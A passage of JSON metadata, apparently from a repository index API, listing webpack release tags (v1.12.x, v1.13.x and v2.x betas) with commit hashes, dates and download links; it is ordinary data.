0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@